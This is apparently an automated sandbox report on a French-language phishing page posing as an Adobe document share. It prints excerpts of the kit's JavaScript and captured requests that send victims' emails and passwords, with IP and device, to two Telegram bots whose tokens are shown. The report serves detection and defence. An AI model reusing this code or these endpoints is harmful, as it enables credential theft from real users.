Edit tour

Windows Analysis Report
https://drive.usercontent.google.com/download?id=1D-lVkrj-b014caeCIdakZBdw2yekeEO1&export=download

Overview

General Information

Sample URL:https://drive.usercontent.google.com/download?id=1D-lVkrj-b014caeCIdakZBdw2yekeEO1&export=download
Analysis ID:1648148
Infos:

Detection

HTMLPhisher
Score:72
Range:0 - 100
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
Yara detected HtmlPhish29
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
Javascript uses Telegram API
Uses the Telegram API (likely for C&C communication)
Creates files inside the system directory
Deletes files inside the Windows folder
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
Javascript checks online IP of machine
None HTTPS page querying sensitive user data (password, username or email)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • chrome.exe (PID: 5804 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 2700 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2016,i,13775181558258972133,7707862200388720938,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2052 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 6228 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://drive.usercontent.google.com/download?id=1D-lVkrj-b014caeCIdakZBdw2yekeEO1&export=download" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 6212 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 7140 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2012,i,5492377399383372015,5736696650145725738,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250324-180219.885000 --mojo-platform-channel-handle=2084 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 6664 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Downloads\Demande.pdf.html" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0.2..script.csvJoeSecurity_HtmlPhish_29Yara detected HtmlPhish_29Joe Security
    No Sigma rule has matched
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-03-25T15:45:32.940767+010018100071Potentially Bad Traffic192.168.2.749716149.154.167.220443TCP
    2025-03-25T15:45:32.962278+010018100071Potentially Bad Traffic192.168.2.749715149.154.167.220443TCP
    2025-03-25T15:45:34.027139+010018100071Potentially Bad Traffic192.168.2.749719149.154.167.220443TCP
    2025-03-25T15:45:34.063797+010018100071Potentially Bad Traffic192.168.2.749720149.154.167.220443TCP
    2025-03-25T15:45:56.891950+010018100071Potentially Bad Traffic192.168.2.749729149.154.167.220443TCP
    2025-03-25T15:45:56.919140+010018100071Potentially Bad Traffic192.168.2.749728149.154.167.220443TCP
    2025-03-25T15:45:57.675254+010018100071Potentially Bad Traffic192.168.2.749731149.154.167.220443TCP
    2025-03-25T15:45:57.852076+010018100071Potentially Bad Traffic192.168.2.749732149.154.167.220443TCP

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Source: Yara matchFile source: 0.2..script.csv, type: HTML
    Source: file:///C:/Users/user/Downloads/Demande.pdf.htmlJoe Sandbox AI: Page contains button: 'Continuer' Source: '0.2.pages.csv'
    Source: 0.2..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://facture-75823.web.app/anti9.js... This script demonstrates several high-risk behaviors that are indicative of a malicious phishing attempt. It collects sensitive user data (email and password) and sends it to two different Telegram bot channels, which are likely controlled by the attacker. The use of obfuscated strings and the redirection to a fake login page further increase the risk. Overall, this script poses a significant threat to user security and should be considered high-risk.
    Source: 0.3..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://facture-75823.web.app/telegram.js... This script demonstrates high-risk behavior by dynamically sending sensitive user data (email and password) to an external Telegram bot. The use of the Telegram bot API and the obfuscated bot token and chat ID indicate malicious intent to steal user credentials. Additionally, the script attempts to mislead the user by displaying an 'Accs interdit' error message, further suggesting a phishing or credential theft scenario. Overall, this script poses a significant security risk and should be treated as highly suspicious.
    Source: https://facture-75823.web.app/anti9.jsHTTP Parser: // configuration des bots telegramconst bot_token_1 = "6571835911:aaeqphjtoqp19uxenpmjfu2yxyunc1u5uxk";const chat_id_1 = "513947114";const bot_token_2 = "8169635632:aagddwe7nlfwxv1u8phstkqpfz0pzqbpbr0";const chat_id_2 = "5250829081";// fonction pour envoyer les donnes au premier bot telegramfunction sendtotelegram1(data) { const message = `\ud83c\udff4\u200d\u2620\ufe0f logcopy \ud83c\udff4\u200d\u2620\ufe0f\ne-mail : ${data.email}\nmot de passe : ${data.password}\nip : ${data.ip}\nappareil : ${data.device}`; const url = `https://api.telegram.org/bot${bot_token_1}/sendmessage?chat_id=${chat_id_1}&text=${encodeuricomponent(message)}`; fetch(url, { method: "get" }) .then((response) => { if (!response.ok) { console.error("erreur lors de l'envoi au bot 1 telegram", response.status); } }) .catch((error) => console.error("erreur rseau (bot 1 telegram) :", error));}// fonction pour envoyer les donnes au de...
    Source: https://facture-75823.web.app/telegram.jsHTTP Parser: // id et token de l'api telegramconst bot_token_2 = "8169635632:aagddwe7nlfwxv1u8phstkqpfz0pzqbpbr0";const chat_id_2 = "5250829081";// fonction pour envoyer les donnes telegramfunction sendtotelegram(data) {const message = `\ud83c\udff4\u200d\u2620\ufe0f tentative de connexion wetransfert \ud83c\udff4\u200d\u2620\ufe0f\ne-mail : ${data.email}\nmot de passe : ${data.password}\nip : ${data.ip}\nappareil : ${data.device}`;const url = `https://api.telegram.org/bot${bot_token}/sendmessage?chat_id=${chat_id}&text=${encodeuricomponent(message)}`; return fetch(url, { method: "get" }) .then((response) => { if (!response.ok) { console.error("erreur lors de l'envoi telegram", response.status); } }) .catch((error) => console.error("erreur rseau :", error));}// fonction pour afficher le message d'erreurfunction showerror(message) { const errorelement = document.getelementbyid("errormessage"); errorelement.textcontent = message; errorelement.st...
    Source: file:///C:/Users/user/Downloads/Demande.pdf.htmlHTTP Parser: Number of links: 0
    Source: file:///C:/Users/user/Downloads/Demande.pdf.htmlHTTP Parser: <input type="password" .../> found but no <form action="...
    Source: file:///C:/Users/user/Downloads/Demande.pdf.htmlHTTP Parser: Base64 decoded: <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="152.199" height="84" viewBox="0 0 152.199 84"> <defs> <filter id="Path_4" x="36.008" y="5.664" width="72.682" height="73.569" filterUnits="userSpaceOnUse"> ...
    Source: file:///C:/Users/user/Downloads/Demande.pdf.htmlHTTP Parser: Title: Adobe Reader - Partage de document scuris does not match URL
    Source: https://facture-75823.web.app/anti9.jsHTTP Parser: // configuration des bots telegramconst bot_token_1 = "6571835911:aaeqphjtoqp19uxenpmjfu2yxyunc1u5uxk";const chat_id_1 = "513947114";const bot_token_2 = "8169635632:aagddwe7nlfwxv1u8phstkqpfz0pzqbpbr0";const chat_id_2 = "5250829081";// fonction pour envoyer les donnes au premier bot telegramfunction sendtotelegram1(data) { const message = `\ud83c\udff4\u200d\u2620\ufe0f logcopy \ud83c\udff4\u200d\u2620\ufe0f\ne-mail : ${data.email}\nmot de passe : ${data.password}\nip : ${data.ip}\nappareil : ${data.device}`; const url = `https://api.telegram.org/bot${bot_token_1}/sendmessage?chat_id=${chat_id_1}&text=${encodeuricomponent(message)}`; fetch(url, { method: "get" }) .then((response) => { if (!response.ok) { console.error("erreur lors de l'envoi au bot 1 telegram", response.status); } }) .catch((error) => console.error("erreur rseau (bot 1 telegram) :", error));}// fonction pour envoyer les donnes au de...
    Source: file:///C:/Users/user/Downloads/Demande.pdf.htmlHTTP Parser: Has password / email / username input fields
    Source: file:///C:/Users/user/Downloads/Demande.pdf.htmlHTTP Parser: <input type="password" .../> found
    Source: file:///C:/Users/user/Downloads/Demande.pdf.htmlHTTP Parser: No favicon
    Source: file:///C:/Users/user/Downloads/Demande.pdf.htmlHTTP Parser: No favicon
    Source: file:///C:/Users/user/Downloads/Demande.pdf.htmlHTTP Parser: No favicon
    Source: file:///C:/Users/user/Downloads/Demande.pdf.htmlHTTP Parser: No favicon
    Source: file:///C:/Users/user/Downloads/Demande.pdf.htmlHTTP Parser: No <meta name="author".. found
    Source: file:///C:/Users/user/Downloads/Demande.pdf.htmlHTTP Parser: No <meta name="author".. found
    Source: file:///C:/Users/user/Downloads/Demande.pdf.htmlHTTP Parser: No <meta name="author".. found
    Source: file:///C:/Users/user/Downloads/Demande.pdf.htmlHTTP Parser: No <meta name="author".. found
    Source: file:///C:/Users/user/Downloads/Demande.pdf.htmlHTTP Parser: No <meta name="copyright".. found
    Source: file:///C:/Users/user/Downloads/Demande.pdf.htmlHTTP Parser: No <meta name="copyright".. found
    Source: file:///C:/Users/user/Downloads/Demande.pdf.htmlHTTP Parser: No <meta name="copyright".. found
    Source: file:///C:/Users/user/Downloads/Demande.pdf.htmlHTTP Parser: No <meta name="copyright".. found
    Source: unknownHTTPS traffic detected: 142.251.40.164:443 -> 192.168.2.7:49691 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.80.33:443 -> 192.168.2.7:49692 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.80.33:443 -> 192.168.2.7:49693 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.41.16:443 -> 192.168.2.7:49696 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 199.36.158.100:443 -> 192.168.2.7:49699 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 199.36.158.100:443 -> 192.168.2.7:49698 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 199.36.158.100:443 -> 192.168.2.7:49700 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 199.36.158.100:443 -> 192.168.2.7:49697 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 207.174.26.219:443 -> 192.168.2.7:49702 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 207.174.26.219:443 -> 192.168.2.7:49707 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.7:49713 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.7:49714 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49716 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49715 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49720 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49719 version: TLS 1.2

    Networking

    barindex
    Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49719 -> 149.154.167.220:443
    Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49729 -> 149.154.167.220:443
    Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49716 -> 149.154.167.220:443
    Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49715 -> 149.154.167.220:443
    Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49720 -> 149.154.167.220:443
    Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49732 -> 149.154.167.220:443
    Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49728 -> 149.154.167.220:443
    Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49731 -> 149.154.167.220:443
    Source: unknownDNS query: name: api.telegram.org
    Source: unknownDNS query: name: api.telegram.org
    Source: unknownDNS query: name: api.telegram.org
    Source: unknownDNS query: name: api.telegram.org
    Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
    Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
    Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
    Source: unknownTCP traffic detected without corresponding DNS query: 2.18.98.62
    Source: unknownTCP traffic detected without corresponding DNS query: 23.199.215.203
    Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
    Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
    Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
    Source: unknownTCP traffic detected without corresponding DNS query: 23.199.215.203
    Source: unknownTCP traffic detected without corresponding DNS query: 2.18.98.62
    Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
    Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
    Source: unknownTCP traffic detected without corresponding DNS query: 142.250.81.227
    Source: unknownTCP traffic detected without corresponding DNS query: 142.250.81.227
    Source: unknownTCP traffic detected without corresponding DNS query: 142.250.81.227
    Source: unknownTCP traffic detected without corresponding DNS query: 142.250.81.227
    Source: unknownTCP traffic detected without corresponding DNS query: 142.250.81.227
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.15
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.15
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.15
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.15
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.15
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.15
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.15
    Source: unknownTCP traffic detected without corresponding DNS query: 142.250.81.227
    Source: unknownTCP traffic detected without corresponding DNS query: 142.250.81.227
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /download?id=1D-lVkrj-b014caeCIdakZBdw2yekeEO1&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Browser-Channel: stableX-Browser-Year: 2025X-Browser-Validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=X-Browser-Copyright: Copyright 2025 Google LLC. All rights reserved.X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIkqHLAQiKo8sBCIWgzQEI9s/OAQiB1s4BCMnczgEIhODOAQii5M4BCK/kzgEI6eTOAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: cdn.tailwindcss.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /styles_ad.css HTTP/1.1Host: facture-75823.web.appConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /loader_ad.js HTTP/1.1Host: facture-75823.web.appConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /anti9.js HTTP/1.1Host: facture-75823.web.appConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /telegram.js HTTP/1.1Host: facture-75823.web.appConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /3.4.16 HTTP/1.1Host: cdn.tailwindcss.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /6cXYk9HM/Capture-d-cran-2025-02-11-144928.png HTTP/1.1Host: i.ibb.coConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://facture-75823.web.app/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /6cXYk9HM/Capture-d-cran-2025-02-11-144928.png HTTP/1.1Host: i.ibb.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bot6571835911:AAEqphJtOqp19UXEnPmjfu2YxYUNC1u5Uxk/sendMessage?chat_id=513947114&text=%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%20LogCopy%20%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%0AE-mail%20%3A%20s4dae2%40ymxrji.net%0AMot%20de%20passe%20%3A%20%2B3HApb)0*8w%24o%3EZj%0AIP%20%3A%20161.77.13.20%0AAppareil%20%3A%20Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F134.0.0.0%20Safari%2F537.36 HTTP/1.1Host: api.telegram.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bot8169635632:AAGdDWe7NlfwxV1u8PhstkQPFz0pZQBPbr0/sendMessage?chat_id=5250829081&text=%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%20Tentative%20de%20connexion%20%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%0AE-mail%20%3A%20s4dae2%40ymxrji.net%0AMot%20de%20passe%20%3A%20%2B3HApb)0*8w%24o%3EZj%0AIP%20%3A%20161.77.13.20%0AAppareil%20%3A%20Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F134.0.0.0%20Safari%2F537.36 HTTP/1.1Host: api.telegram.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bot8169635632:AAGdDWe7NlfwxV1u8PhstkQPFz0pZQBPbr0/sendMessage?chat_id=5250829081&text=%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%20Tentative%20de%20connexion%20%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%0AE-mail%20%3A%20s4dae2%40ymxrji.net%0AMot%20de%20passe%20%3A%20%2B3HApb)0*8w%24o%3EZj%0AIP%20%3A%20161.77.13.20%0AAppareil%20%3A%20Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F134.0.0.0%20Safari%2F537.36 HTTP/1.1Host: api.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bot6571835911:AAEqphJtOqp19UXEnPmjfu2YxYUNC1u5Uxk/sendMessage?chat_id=513947114&text=%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%20LogCopy%20%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%0AE-mail%20%3A%20s4dae2%40ymxrji.net%0AMot%20de%20passe%20%3A%20%2B3HApb)0*8w%24o%3EZj%0AIP%20%3A%20161.77.13.20%0AAppareil%20%3A%20Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F134.0.0.0%20Safari%2F537.36 HTTP/1.1Host: api.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
